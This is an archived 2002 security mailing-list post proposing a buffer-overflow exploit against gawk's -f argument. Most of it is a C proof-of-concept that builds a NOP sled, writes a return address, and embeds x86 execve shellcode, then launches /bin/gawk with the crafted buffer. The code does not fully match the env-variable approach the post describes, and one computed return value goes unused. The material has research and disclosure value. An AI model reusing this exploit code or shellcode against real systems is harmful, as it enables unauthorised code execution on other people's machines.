|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Gabriel A. Maggiotti (gmaggiot
ciudad.com.ar)Date: Fri Mar 15 2002 - 12:24:21 CST
I do a little research, and found that only accept ascci chars as arg
and if you try to put a shellcode in the arg nothing occurs.
I think if we store the shellcode in an env variable and write the ret
address pointing to env shellcode could work. I attach a prove I made.
/*
---------------------------------------------------------------------------
Web: http://qb0x.net Author: Gabriel A. Maggiotti
Date: March 15, 2002 E-mail: gmaggiotciudad.com.ar
---------------------------------------------------------------------------
*/
#include <stdio.h>
#define OFFSET 18215
#define NOP 0x90
#define RET_72 0xbfffc6f0
#define RET 0x41
int
main(int argc, char *argv[])
{
int i=0; char buf[OFFSET];
int c, ret;
char shellcode1[] =
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69/bin/ls";
ret = RET_72 - OFFSET;
for(i=0;i<=OFFSET-1 ;i++)
buf[i]=NOP;
*(int *) &buf[i] = RET;
memcpy(buf+131,shellcode1,strlen(shellcode1));
buf[0]='-';
buf[1]='f';
buf[2]=' ';
execl("/bin/gawk", "/bin/gawk", buf, NULL);
//puts(buf);
return 0;
}
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]